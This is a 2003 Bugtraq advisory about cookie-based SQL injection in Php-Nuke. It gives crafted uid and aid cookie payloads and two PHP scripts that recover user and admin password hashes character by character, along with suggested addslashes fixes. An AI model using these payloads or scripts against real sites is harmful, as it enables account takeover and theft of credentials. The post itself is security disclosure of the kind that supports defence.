lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <HFPMRE$A06091B9C1472FD1F769D1D50E5FBCA8@libero.it>
Date: Fri, 30 May 2003 19:18:50 +0200
From: bugsman <bugsman@...ero.it>
To: bugtraq <bugtraq@...urityfocus.com>
Subject: Php-Nuke:users and admins password hashes vulnerability


BUGSMAN: serving security from Italy since..hem..well, about 1 year 
------------------------------------------------------------------------------------- 
Object: users & admins password hash retrieving 
Tested on Php-Nuke 5.6 e 6.5 
Vulnerable versions: I've never seen a patch for this so potentially all versions could be vulnerable... 
------------------------------------------------------------------------------------- 
Description: 
An attacker can obtain password hashes for users and admins, using a particular SQL injection with cookies. 
An incredible amount of sites are vulnerable to these attacks. 
Note: Since the SQL injection works with cookies, this problem is not prevented by turning GPC_magic_quotes 
on. 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
USER HASH: 
To get the password hash of an user, the attacker just needs a valid account... 
The attacker visits www.victimsite.com/modules.php?name=Your_Account sending a spoofed user cookie crafted 
in this way: 
uid should be: ' or (uname='username_to_hack' and pass like 'a%') or uname = 'valid_username 
uname should be:  username_to_hack 
pass should be: valid_password 
Next stepis to examine the result page. If the page is the login page (the one with textboxes) it means that 
the hash of the password to crack is really LIKE 'a%' and the attacker can go on with the next character. 
If the page is the details page for the username_to_hack, then it's time to try LIKE 'B%'... 
In max 512 guesses the attacker has the hash of username_to_hack and now it is possible to create a spoofed 
cookie to be recognized as username_to_hack. 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
ADMIN HASH: 
To get the password hash of an admin, the attacker only needs to know the name of that admin, and needs that 
the Web_Links module should be active and with at least one link: 
NOTE: The attacker doesn't need a valid account, and can exploit the bug even if the Web_Links module is 
active only for registered members... 
The attacker visits www.victimsite.com/modules.php?name=Web_Links&l_op=viewlink&cid=2  
sending a spoofed admin cookie crafted in this way: 
aid should be: admin_to_hack' and pwd like 'a% 
pwd should be: anything you want 
Now the attacker examine the page: if the links have the Edit links active, it means the password hash is 
really LIKE 'a%' so go on with next character, otherwise go on with LIKE 'b%' 
NOTE: This trick works with some modification, with l_op=MostPopular and l_op=NewLinksDate too. 
With the hash the attacker can spoof a cookie and get into the admin section of the site. 
IMPORTANT NOTE: it is not really a problem to obtain the name of an admin, since the name of the God admin 
can be obtained just using this exploit with different injections. So what the attacker REALLY needs is the 
Web_Links module active and with at least one link!!!AND NOTHING MORE!!! 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
QUICK-AND-DIRTY FIX: 
Since I contacted Francisco Burzi, but I didn't get any response I post a quick-and-dirty fix right out of 
my brain :) 
DISCLAIMER: I TAKE NO RESPONSABILITY FOR ANY KIND OF DAMAGE OR MISWORKING OF THE SITE CAUSED BY MY FIXES. 
THESE ARE NOT OFFICIAL PHP-NUKE FIXES SO APPLY THEM AT YOUR OWN RISK! 
ANOTHER NOTE: I FIX MY PHP-NUKE THIS WAY AND IT WORKS, IT SHOULD WORK FOR YOU TOO.... 
FIXING USER EXPLOIT: 
in file /mainfile.php, in function is_user, before the line: 
   if ($uid != '' AND $pwd != '')  
add this line: 
$uid=addslashes($uid); 
 
FIXING ADMIN EXPLOIT: 
in file /modules/Web_Links/index.php, in functions NewLinksDate, MostPopular and viewlink 
before the line: 
$admin=explode(":",$admin); 
add this line: 
$admin=addslashes($admin); 
then change this line: 
$result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid ='$aid'", dbi); 
and make it look like this one: 
$result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid='$aid' and 
pwd='$admin[1]'", dbi); 
NOTE: YOU HAVE TO DO THIS FOR ALL THE 3 FUNCTIONS LISTED BEFORE!!! 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
ARE YOU WEAK? 
Here you can find two php pages that you can use to find out if your site is vulnerable to this attack. Just 
upload the pages on the webserver running php-nuke in the same directory for your config.php and open them. 
NOTE:THESE SCRIPT ARE VERY POOR-CODED, AND I DO NOT ASSURE THAT THEIR 
RESPONSE IS RIGHT!  THEY WORKED FOR ME AND I HOPE THEY WORK FOR YOU TOO! SORRY FOR THE POOR CODING BUT THE 
SCRIPTS WERE MADE IN HALF AN HOUR :) 
NOTE: BEFORE YOU EXECUTE THE SCRIPT, BE SURE TO PERSONALIZE THE VALUES WHERE INDICATED!!! 
This one is to check  the user vulnerability: 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
<?php 
//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! 
//This one checks for the user password hash retrieving vulnerability 
//Note: adjust the script execution time in your php.ini if the script 
//takes too long 
$server="localhost"; 
$script="/modules.php?name=Your_Account"; 
$validaccount="account";// <---Put a valid username here!!! 
$validpass="password";   // <---Put the password for the above username here!!! 
$account_to_hack="pippo";//<--- Put another valid username here!!! 
$md5char[0]="0"; 
$md5char[1]="1"; 
$md5char[2]="2"; 
$md5char[3]="3"; 
$md5char[4]="4"; 
$md5char[5]="5"; 
$md5char[6]="6"; 
$md5char[7]="7"; 
$md5char[8]="8"; 
$md5char[9]="9"; 
$md5char[10]="a"; 
$md5char[11]="b"; 
$md5char[12]="c"; 
$md5char[13]="d"; 
$md5char[14]="e"; 
$md5char[15]="f"; 
$found=0; 
$md5reg=""; 
 
function sendToHost($host,$method,$path,$cook) 
{ 
	$buf=""; 
	$method = strtoupper($method); 
	$fp = fsockopen($host,80); 
	fputs($fp, "$method $path HTTP/1.1\n"); 
	fputs($fp, "Host: $host\n"); 
	fputs($fp, "Connection: close\n"); 
	fputs($fp, "Pragma: no-cache\n"); 
	fputs($fp, "Cache-control: no-cache\n"); 
	fputs($fp, "Cookie: user=$cook; lang=italian\n"); 
	fputs($fp, "\n\n"); 
	while (!feof($fp)) 
		$buf .= fgets($fp,128); 
	fclose($fp); 
	return $buf; 
} 
if (!isset($charindex)) 
	$charindex=0; 
$found=0; 
while($charindex<16){ 
	$md5reg="$md5char[$charindex]%"; 
	$uid="' or (uname = '$account_to_hack' and pass like '$md5reg') or uname = '$validaccount"; 
	$validpass=md5("$validpass"); 
	$cookie=base64_encode("$uid:$account_to_hack:$validpass"); 
	$cookie=str_replace("=","%3D",$cookie); 
	$data=sendToHost("$server","get","$script","$cookie"); 
	if (eregi("Password",$data)){ 
		$found += 1; 
		$charindex += 1; 
	} 
	else{ $charindex += 1; 
		Header("Location: ".$PHP_SELF."?charindex=$charindex&charfound=$charfound&curmd5=$curmd5"); 
	} 
} 
echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; 
echo "This one check for the user password hash retrieving vulnerability...<br>"; 
if($found==16) 
	echo "You are NOT vulnerable<br>"; 
else 
	echo "You are vulnerable!<br>Apply a fix ASAP<br>"; 
echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; 
?> 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
And this one is to check the admin vulnerability: 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
<?php 
//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! 
//This one checks for the admin password hash retrieving vulnerability 
//Note: adjust the script execution time in your php.ini if the script 
//takes too long 
$server="localhost"; 
$script="/modules.php?name=Web_Links&l_op=viewlink&cid=1";//<---put a cid that shows a page with links in it 
$account_to_hack="admin";//<--- Put the admin username here!!! 
$md5char[0]="0"; 
$md5char[1]="1"; 
$md5char[2]="2"; 
$md5char[3]="3"; 
$md5char[4]="4"; 
$md5char[5]="5"; 
$md5char[6]="6"; 
$md5char[7]="7"; 
$md5char[8]="8"; 
$md5char[9]="9"; 
$md5char[10]="a"; 
$md5char[11]="b"; 
$md5char[12]="c"; 
$md5char[13]="d"; 
$md5char[14]="e"; 
$md5char[15]="f"; 
$found=0; 
$md5reg=""; 
 
function sendToHost($host,$method,$path,$cook) 
{ 
	$buf=""; 
	$method = strtoupper($method); 
	$fp = fsockopen($host,80); 
	fputs($fp, "$method $path HTTP/1.1\n"); 
	fputs($fp, "Host: $host\n"); 
	fputs($fp, "Connection: close\n"); 
	fputs($fp, "Pragma: no-cache\n"); 
	fputs($fp, "Cache-control: no-cache\n"); 
	fputs($fp, "Cookie: admin=$cook; lang=italian\n"); 
	fputs($fp, "\n\n"); 
	while (!feof($fp)) 
		$buf .= fgets($fp,128); 
	fclose($fp); 
	return $buf; 
} 
if (!isset($charindex)) 
	$charindex=0; 
$found=0; 
while(($charindex<16)&&($found==0)){ 
	$md5reg="$md5char[$charindex]%"; 
	$aid="$account_to_hack' and pwd like '$md5reg"; 
	$validpass=md5("useless_pass"); 
	$cookie=base64_encode("$aid:$validpass"); 
	$cookie=str_replace("=","%3D",$cookie); 
	$data=sendToHost("$server","get","$script","$cookie"); 
	if (eregi("Edit",$data)){ 
		$found += 1; 
		$charindex += 1; 
	} 
	else{ $charindex += 1; 
//		echo "$data"; 
		Header("Location: ".$PHP_SELF."?charindex=$charindex"); 
	} 
} 
echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; 
echo "This one check for the admin password hash retrieving vulnerability...<br>"; 
if($found==0) 
	echo "You are NOT vulnerable<br>"; 
else 
	echo "You are vulnerable!<br>Apply a fix ASAP<br>"; 
echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; 
?> 
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< 
 
For any suggestion, comments, hiring (I need money too) or any other thing, contact me at: 
bugsman@...ero.it 
 
See ya!!!! 
 
 
 
 
 



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ